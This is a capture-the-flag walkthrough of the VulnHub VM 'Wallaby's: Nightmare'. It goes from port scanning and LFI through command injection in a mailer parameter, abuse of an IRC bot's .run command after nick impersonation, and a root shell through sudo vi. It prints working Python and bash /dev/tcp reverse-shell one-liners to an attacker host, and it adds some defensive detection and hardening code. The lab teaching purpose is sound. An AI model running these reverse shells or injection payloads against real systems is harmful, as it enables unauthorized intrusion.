[VULNHUB] Wallaby’s: Nightmare (1.0.2)

This VM is really awesome, especially the privilege escalation part! Let’s hack it!

RCE IS YOUR FRIEND

First of all I scanned the VM for open ports:

nmap 192.168.1.11 -p 1-65535

And I got this:

Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-03 18:59 CET
Nmap scan report for 192.168.1.11
Host is up (0.0081s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
6667/tcp filtered irc

Nmap done: 1 IP address (1 host up) scanned in 3.17 seconds

I browsed to http://192.168.1.11 and I found a submit form which said:

Enter a username to get started with this CTF! 

Cool, I typed ReverseBrain and pressed the submit button. I was redirected to a page that gave me some tips; at the end of the page there was a link to start the VM. I clicked Start the CTF! and was redirected to http://192.168.1.11/?page=home. The first thing I tried was an LFI on the page parameter: http://192.168.1.11/?page=../../../../../../etc/passwd and I got:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
walfin:x:1000:1000:walfin,,,:/home/walfin:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false
steven?:x:1001:1001::/home/steven?:/bin/bash
ircd:x:1003:1003:,,,:/home/ircd:/bin/bash

It seemed that the LFI had worked! Looking at the source code of the page I noticed an HTML comment:

This is what we call 'dis-information' in the cyber security world!  Are you learning anything new here ReverseBrain

Grrrr, it was an honeypot… Let’s see if we can also get /etc/shadow with http://192.168.1.11/?page=../../../../../../etc/shadow, but I got this:

That's some fishy stuff you're trying there ReverseBrain buddy. You must think Wallaby codes like a monkey! I better get to securing this SQLi though...

(Wallaby caught you trying an LFI, you gotta be sneakier! Difficulty level has increased.)

Now I tried to navigate around the website, but it seemed that port 80 was closed. So I ran the nmap scan again:

nmap 192.168.1.11 -p 1-65535

And I discovered that the web server had switched to another port:

Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-03 19:10 CET
Nmap scan report for 192.168.1.11
Host is up (0.0082s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
6667/tcp  filtered irc
60080/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 3.15 seconds

So I browsed to http://192.168.1.11:60080/ and on the new web page there was an image and a phrase that said:

HOLY MOLY, this guy ReverseBrain wants me...Glad I moved to a different port so I could work more securely!!!

Eheheheh, now I tried to brute-force the page names. I browsed to http://192.168.1.11:60080/?page=test and I got an error:

Dude, ReverseBrain what are you trying over here?!

Now I reloaded the page, intercepting the GET request with Burp Suite, and sent it to Intruder with the following payload position:

GET /?page=§test§ HTTP/1.1
Host: 192.168.1.11:60080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

I used raft-small-directories-lowercase.txt as the wordlist and I found index, home, mailer and blacklist. I browsed to http://192.168.1.11:60080/?page=mailer and there was only a Coming soon guys! blue header. In the source code I found a comment that said:

/?page=mailer&mail=mail wallaby "message goes here"

So I checked whether the mail parameter was vulnerable to RCE by requesting http://192.168.1.11:60080/?page=mailer&mail=id, and I got:

uid=33(www-data) gid=33(www-data) groups=33(www-data) 
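The mailer's only documented use is `mail wallaby "message goes here"`, so any other mail= value is a command-injection attempt a defender can alert on. The following is an added example, not code from the VM or this writeup: a detector that runs over constructed Apache access-log lines for the ?page=mailer endpoint, plus the server-side fix (user input as argv data, never a shell string). The log lines, the `Wallaby's mailer` subject and the recipient pattern are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines for the ?page=mailer endpoint (not real logs):
# one without mail=, one legitimate use, and two injection attempts.
ACCESS_LOG = [
    '192.168.1.14 - - [03/Jan/2017:19:20:01 +0100] "GET /?page=mailer HTTP/1.1" 200 512',
    '192.168.1.14 - - [03/Jan/2017:19:20:30 +0100] "GET /?page=mailer&mail=mail%20wallaby%20%22hello%22 HTTP/1.1" 200 640',
    '192.168.1.14 - - [03/Jan/2017:19:21:05 +0100] "GET /?page=mailer&mail=id HTTP/1.1" 200 701',
    '192.168.1.14 - - [03/Jan/2017:19:22:41 +0100] "GET /?page=mailer&mail=python%20-c%20%27import%20socket%27 HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# The only shape the feature should ever accept: mail <local user> "<text>"
EXPECTED_MAIL_RE = re.compile(r'^mail [a-z_][a-z0-9_-]{0,31} "[^"`$;|&<>\\]*"$')
RECIPIENT_RE = re.compile(r'^[a-z_][a-z0-9_-]{0,31}$')  # assumed user-name policy


def mail_param(log_line):
    """Return the decoded mail= value of a ?page=mailer request, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    query = parse_qs(urlsplit(m.group("target")).query)
    if query.get("page") != ["mailer"] or "mail" not in query:
        return None
    return query["mail"][0]


def suspicious_mail_requests(lines):
    """Return (line, decoded value) pairs whose mail= is not a plain mail command."""
    hits = []
    for line in lines:
        value = mail_param(line)
        if value is not None and not EXPECTED_MAIL_RE.match(value):
            hits.append((line, value))
    return hits


def hardened_argv(recipient, message):
    """Server-side fix: build (argv, stdin) for subprocess.run, no shell involved.

    The allowlist also rejects a leading '-', so no option injection either."""
    if not RECIPIENT_RE.match(recipient):
        raise ValueError("rejected recipient: %r" % recipient)
    return ["mail", "-s", "Wallaby's mailer", recipient], message.encode()
```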

Cool! Now I can get a reverse shell. First of all I started listening locally:

nc -lvp 1234

Then I typed:

http://192.168.1.11:60080/?page=mailer&mail=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.1.14",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now I had a reverse shell, and I got a TTY with:

python -c 'import pty; pty.spawn("/bin/bash")'

Now I need to escalate privileges.

TAKE CARE ABOUT THE IRC BOTS!

First of all I tried:

sudo -l

This is the output:

Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (waldo) NOPASSWD: /usr/bin/vim /etc/apache2/sites-available/000-default.conf
    (ALL) NOPASSWD: /sbin/iptables

So I can modify iptables as root. I took a look at the processes too:

waldo      727  0.0  0.5  29416  2924 ?        Ss   09:55   0:00 tmux new-session -d -s irssi
waldo      729  0.0  0.1   4508   700 pts/0    Ss   09:55   0:00 -sh
waldo      749  0.0  1.7 115744  8520 pts/0    Sl+  09:55   0:00 irssi
wallaby    977  0.0  4.9 516868 24964 ?        Sl   09:55   0:00 /usr/bin/python3 /usr/bin/sopel -d --quiet

It seems that waldo is connected to the IRC server, which is not accessible from the external network, and there also seems to be an IRC bot made with Sopel and started by wallaby. First of all, check the iptables rules:

Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     tcp  --  127.0.0.1            0.0.0.0/0            tcp dpt:6667
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:6667

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination 

As I suspected, iptables DROPs requests to the IRC port 6667 from any source (0.0.0.0/0) but accepts them from localhost. Remove this rule and add a new one:

sudo iptables -D INPUT -p tcp -m tcp --dport 6667 -j DROP
sudo iptables -A INPUT -p tcp -s 0.0.0.0 --dport 6667 -j ACCEPT

Now I could connect to the IRC server from HexChat, which is already installed on my Kali box. I added a new server called CTF with IP/port 192.168.1.11/6667. I found the only available channel, #wallabyschat (from irssi inside the exploited VM), and joined it:

/join #wallabyschat

There were 3 users: me, waldo (who was the channel operator) and wallabysbot. The bot is made with Sopel, which accepts a lot of commands, including .run. I typed it and I got a response from the bot:

Hold on, you aren't Waldo?

I analyzed the command by browsing to /home/wallaby/.sopel/modules, where I found run.py:

import sopel.module, subprocess, os
from sopel.module import example

@sopel.module.commands('run')
@example('.run ls')
def run(bot, trigger):
     if trigger.owner:
          os.system('%s' % trigger.group(2))
          runas1 = subprocess.Popen('%s' % trigger.group(2), stdout=subprocess.PIPE).communicate()[0]
          runas = str(runas1)
          bot.say(' '.join(runas.split('\\n')))
     else:
          bot.say('Hold on, you aren\'t Waldo?')
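The only gate in front of that `os.system` call is `trigger.owner`, and the rest of the writeup shows that on this VM holding the owner's nick is enough to pass it. As an added example (not Sopel's code and not the VM's module), here is a minimal model of the three ways an IRC bot can decide "is this the owner?", run against constructed raw IRC lines; the owner's hostmask, the `~kali` ident and the IRCv3 `account` tag usage are assumptions.

```python
import re

# Model of an IRC bot's owner check (constructed, not Sopel's implementation).
# Optional IRCv3 message tags (e.g. @account=waldo) precede the prefix.
PRIVMSG_RE = re.compile(
    r"^(?:@(?P<tags>\S+) )?:(?P<nick>[^!\s]+)!(?P<user>[^@\s]+)@(?P<host>\S+)"
    r" PRIVMSG (?P<target>\S+) :(?P<text>.*)$")

OWNER_NICK = "waldo"
OWNER_HOSTMASK = ("waldo", "~waldo", "localhost")  # assumed owner hostmask
OWNER_ACCOUNT = "waldo"                             # assumed services account


def parse_privmsg(line):
    """Split a raw PRIVMSG into tags, nick, ident, host, target and text."""
    m = PRIVMSG_RE.match(line)
    if not m:
        raise ValueError("not a PRIVMSG: %r" % line)
    msg = m.groupdict()
    tags = msg.pop("tags") or ""
    msg["tags"] = dict(t.partition("=")[::2] for t in tags.split(";") if t)
    return msg


def is_owner_by_nick(msg):
    """Weak: whoever currently holds the nick is the owner."""
    return msg["nick"].lower() == OWNER_NICK


def is_owner_by_hostmask(msg):
    """Better: nick, ident and host must all match the configured owner."""
    return (msg["nick"].lower(), msg["user"], msg["host"]) == OWNER_HOSTMASK


def is_owner_by_account(msg):
    """Best on networks with services: trust the account the server attached
    to the message (IRCv3 account-tag), which a /nick change cannot forge."""
    return msg["tags"].get("account") == OWNER_ACCOUNT


# Constructed messages: the real owner, then someone who took the nick
# "waldo" after the owner dropped off the server.
REAL_OWNER = "@account=waldo :waldo!~waldo@localhost PRIVMSG #wallabyschat :.run id"
IMPOSTOR = ":waldo!~kali@192.168.1.14 PRIVMSG #wallabyschat :.run id"
```

Only the nick check passes for both messages; the hostmask and account checks distinguish the impostor, which is why a bot's command authorization should never rest on the visible nick alone.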

Nice! There is an RCE vulnerability, but I need to be recognized as waldo first. So I edited the iptables rules:

sudo iptables -D INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 6667 -j ACCEPT
sudo iptables -A OUTPUT -o enp0s17 -s 127.0.0.1 -p tcp --dport 6667 -m owner --uid-owner waldo -j DROP

After a few minutes waldo got a timeout error. After that I changed my nick:

/nick waldo

Now I exploited the RCE vulnerability:

.run id

It worked! I started listening locally:

nc -lvp 1235

Then I sent this string to the bot:

.run python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.14",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now I had another reverse shell, as wallaby. I got a TTY and typed:

sudo -l

This is the output:

Matching Defaults entries for wallaby on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wallaby may run the following commands on ubuntu:
    (ALL) NOPASSWD: ALL

I can run all commands with sudo. So I typed:

export TERM=xterm
sudo vi

Then I pressed ESC to enter command mode and pressed ENTER. Now I started listening locally:

nc -lvp 1236

Now from vi I typed:

:!bash -i >& /dev/tcp/192.168.1.14/1236 0>&1

Now I had a shell as root. Browsing /root I found flag.txt:

###CONGRATULATIONS###

You beat part 1 of 2 in the "Wallaby's Worst Knightmare" series of vms!!!!

This was my first vulnerable machine/CTF ever!  I hope you guys enjoyed playing it as much as I enjoyed making it!

Come to IRC and contact me if you find any errors or interesting ways to root, I'd love to hear about it.

Thanks guys!
-Waldo